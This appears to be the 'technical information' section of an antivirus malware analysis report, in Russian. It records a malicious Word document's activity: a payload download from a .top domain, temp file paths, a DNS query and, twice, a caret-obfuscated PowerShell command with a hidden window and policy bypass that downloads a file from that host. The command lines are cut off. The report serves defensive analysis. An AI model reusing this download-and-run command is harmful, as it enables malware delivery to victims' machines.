Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwE^Rshe^LL.^Exe -ex^eC^u^TI^o^NPOliC^y^ ^ByP^asS -nO^P^RoFILE ^-W^iN^dOwsTyL^e h^i^d^DEn^ (n^ew^-objEcT sYsT^em^.^ne^t^.w^e^bcLIeNt^).d^o^WNloAdF^i^l^e^('http://www.zoer...
- %TEMP%\word\<Имя файла>.doc
- %TEMP%\word\<Имя файла>.doc
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "pOwE^Rshe^LL.^Exe -ex^eC^u^TI^o^NPOliC^y^ ^ByP^asS -nO^P^RoFILE ^-W^iN^dOwsTyL^e h^i^d^DEn^ (n^ew^-objEcT sYsT^em^.^ne^t^.w^e^bcLIeNt^).d^o^WNloAdF^i^l^e^('http://www.zoer...' (со скрытым окном)